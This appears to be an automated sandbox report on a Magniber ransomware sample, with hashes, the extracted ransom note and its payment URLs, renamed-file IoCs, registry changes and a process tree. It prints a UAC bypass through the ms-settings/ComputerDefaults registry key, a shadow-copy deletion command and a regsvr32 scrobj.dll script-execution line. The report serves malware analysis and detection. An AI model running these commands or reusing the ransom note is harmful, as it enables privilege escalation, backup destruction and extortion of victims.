magniber | 1ede89826be1bb1f5c979f71081b380405a877bceb35202fd5959ae6cb7f492d

Analysis

max time kernel
139s
max time network
127s
platform
windows10_x64
resource
win10-en-20211014
submitted
23-11-2021 06:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://56ac70f0fe7ca27032eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://56ac70f0fe7ca27032eltalkfzj.jobsbig.cam/eltalkfzj http://56ac70f0fe7ca27032eltalkfzj.boxgas.icu/eltalkfzj http://56ac70f0fe7ca27032eltalkfzj.sixsees.club/eltalkfzj http://56ac70f0fe7ca27032eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://56ac70f0fe7ca27032eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://56ac70f0fe7ca27032eltalkfzj.jobsbig.cam/eltalkfzj

http://56ac70f0fe7ca27032eltalkfzj.boxgas.icu/eltalkfzj

http://56ac70f0fe7ca27032eltalkfzj.sixsees.club/eltalkfzj

http://56ac70f0fe7ca27032eltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2320	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2288	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2596	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1612	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1300	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5104	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1136	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1308	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3704	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2472	3248	cmd.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	3248	cmd.exe	110

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

sihost.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\ConvertTrace.tiff => C:\Users\Admin\Pictures\ConvertTrace.tiff.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\CompressStart.crw => C:\Users\Admin\Pictures\CompressStart.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\RestoreCopy.crw => C:\Users\Admin\Pictures\RestoreCopy.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\StepRedo.raw => C:\Users\Admin\Pictures\StepRedo.raw.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertTrace.tiff	sihost.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

description	pid	Process	procid_target
PID 3828 set thread context of 2312	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	33
PID 3828 set thread context of 2336	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	32
PID 3828 set thread context of 2440	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	31
PID 3828 set thread context of 2672	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	27
PID 3828 set thread context of 3584	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	19
PID 3828 set thread context of 3864	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	18

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
3240	3864	WerFault.exe	18

Modifies registry class 29 IoCs

Processes:

sihost.exesvchost.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeExplorer.EXEtaskhostw.exeRuntimeBroker.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
1800	notepad.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeWerFault.exe

pid	Process
3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe
3240	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid	Process
2672	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

pid	Process
3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEWerFault.exeWMIC.exeWMIC.exe

description	pid	Process
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeDebugPrivilege	3240	WerFault.exe
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeShutdownPrivilege	2672	Explorer.EXE
Token: SeCreatePagefilePrivilege	2672	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	2772	WMIC.exe
Token: SeSecurityPrivilege	2772	WMIC.exe
Token: SeTakeOwnershipPrivilege	2772	WMIC.exe
Token: SeLoadDriverPrivilege	2772	WMIC.exe
Token: SeSystemProfilePrivilege	2772	WMIC.exe
Token: SeSystemtimePrivilege	2772	WMIC.exe
Token: SeProfSingleProcessPrivilege	2772	WMIC.exe
Token: SeIncBasePriorityPrivilege	2772	WMIC.exe
Token: SeCreatePagefilePrivilege	2772	WMIC.exe
Token: SeBackupPrivilege	2772	WMIC.exe
Token: SeRestorePrivilege	2772	WMIC.exe
Token: SeShutdownPrivilege	2772	WMIC.exe
Token: SeDebugPrivilege	2772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2772	WMIC.exe
Token: SeRemoteShutdownPrivilege	2772	WMIC.exe
Token: SeUndockPrivilege	2772	WMIC.exe
Token: SeManageVolumePrivilege	2772	WMIC.exe
Token: 33	2772	WMIC.exe
Token: 34	2772	WMIC.exe
Token: 35	2772	WMIC.exe
Token: 36	2772	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2816	WMIC.exe
Token: SeSecurityPrivilege	2816	WMIC.exe
Token: SeTakeOwnershipPrivilege	2816	WMIC.exe
Token: SeLoadDriverPrivilege	2816	WMIC.exe
Token: SeSystemProfilePrivilege	2816	WMIC.exe
Token: SeSystemtimePrivilege	2816	WMIC.exe
Token: SeProfSingleProcessPrivilege	2816	WMIC.exe
Token: SeIncBasePriorityPrivilege	2816	WMIC.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid	Process
2672	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sihost.exesvchost.exetaskhostw.execmd.execmd.exeExplorer.EXEcmd.exeRuntimeBroker.execmd.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2312 wrote to memory of 1800	2312	sihost.exe	70
PID 2312 wrote to memory of 1800	2312	sihost.exe	70
PID 2312 wrote to memory of 4524	2312	sihost.exe	72
PID 2312 wrote to memory of 4524	2312	sihost.exe	72
PID 2312 wrote to memory of 4580	2312	sihost.exe	74
PID 2312 wrote to memory of 4580	2312	sihost.exe	74
PID 2312 wrote to memory of 4556	2312	sihost.exe	75
PID 2312 wrote to memory of 4556	2312	sihost.exe	75
PID 2336 wrote to memory of 648	2336	svchost.exe	78
PID 2336 wrote to memory of 648	2336	svchost.exe	78
PID 2336 wrote to memory of 852	2336	svchost.exe	79
PID 2336 wrote to memory of 852	2336	svchost.exe	79
PID 2440 wrote to memory of 1524	2440	taskhostw.exe	82
PID 2440 wrote to memory of 1524	2440	taskhostw.exe	82
PID 2440 wrote to memory of 2144	2440	taskhostw.exe	83
PID 2440 wrote to memory of 2144	2440	taskhostw.exe	83
PID 4556 wrote to memory of 2772	4556	cmd.exe	86
PID 4556 wrote to memory of 2772	4556	cmd.exe	86
PID 648 wrote to memory of 2816	648	cmd.exe	87
PID 648 wrote to memory of 2816	648	cmd.exe	87
PID 2672 wrote to memory of 2852	2672	Explorer.EXE	88
PID 2672 wrote to memory of 2852	2672	Explorer.EXE	88
PID 2672 wrote to memory of 2992	2672	Explorer.EXE	89
PID 2672 wrote to memory of 2992	2672	Explorer.EXE	89
PID 4580 wrote to memory of 4260	4580	cmd.exe	91
PID 4580 wrote to memory of 4260	4580	cmd.exe	91
PID 3584 wrote to memory of 4112	3584	RuntimeBroker.exe	93
PID 3584 wrote to memory of 4112	3584	RuntimeBroker.exe	93
PID 3584 wrote to memory of 4872	3584	RuntimeBroker.exe	94
PID 3584 wrote to memory of 4872	3584	RuntimeBroker.exe	94
PID 852 wrote to memory of 5036	852	cmd.exe	97
PID 852 wrote to memory of 5036	852	cmd.exe	97
PID 3828 wrote to memory of 4216	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	99
PID 3828 wrote to memory of 4216	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	99
PID 1524 wrote to memory of 4212	1524	cmd.exe	98
PID 1524 wrote to memory of 4212	1524	cmd.exe	98
PID 3828 wrote to memory of 2364	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	102
PID 3828 wrote to memory of 2364	3828	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	102
PID 2144 wrote to memory of 4664	2144	cmd.exe	103
PID 2144 wrote to memory of 4664	2144	cmd.exe	103
PID 2852 wrote to memory of 3580	2852	cmd.exe	104
PID 2852 wrote to memory of 3580	2852	cmd.exe	104
PID 2992 wrote to memory of 4956	2992	cmd.exe	105
PID 2992 wrote to memory of 4956	2992	cmd.exe	105
PID 4112 wrote to memory of 428	4112	cmd.exe	106
PID 4112 wrote to memory of 428	4112	cmd.exe	106
PID 4872 wrote to memory of 504	4872	cmd.exe	107
PID 4872 wrote to memory of 504	4872	cmd.exe	107
PID 4216 wrote to memory of 2756	4216	cmd.exe	108
PID 4216 wrote to memory of 2756	4216	cmd.exe	108
PID 2364 wrote to memory of 3160	2364	cmd.exe	109
PID 2364 wrote to memory of 3160	2364	cmd.exe	109
PID 2596 wrote to memory of 5088	2596	cmd.exe	135
PID 2596 wrote to memory of 5088	2596	cmd.exe	135
PID 2472 wrote to memory of 4048	2472	cmd.exe	146
PID 2472 wrote to memory of 4048	2472	cmd.exe	146
PID 3704 wrote to memory of 4360	3704	cmd.exe	145
PID 3704 wrote to memory of 4360	3704	cmd.exe	145
PID 2288 wrote to memory of 3084	2288	cmd.exe	144
PID 2288 wrote to memory of 3084	2288	cmd.exe	144
PID 5104 wrote to memory of 2928	5104	cmd.exe	143
PID 5104 wrote to memory of 2928	5104	cmd.exe	143
PID 1308 wrote to memory of 3476	1308	cmd.exe	140
PID 1308 wrote to memory of 3476	1308	cmd.exe	140

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3864
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3864 -s 828
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3240

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3584
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4112
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:428
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4872
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:504

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:2672
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4216
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:2756
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3160
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2852
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3580
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4956

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2440
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4212
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2144
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4664

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2336
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:648
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5036

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2312
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1800
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://56ac70f0fe7ca27032eltalkfzj.jobsbig.cam/eltalkfzj^&1^&52177989^&59^&235^&2215063"
  2⤵
  PID:4524
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4580
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4260
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4556
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2772

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2320
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4584

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2292
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4488

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3084

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5088

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1612
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4520

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1300
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1548

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5104
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2928

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1136
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4428

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1308
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3476

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
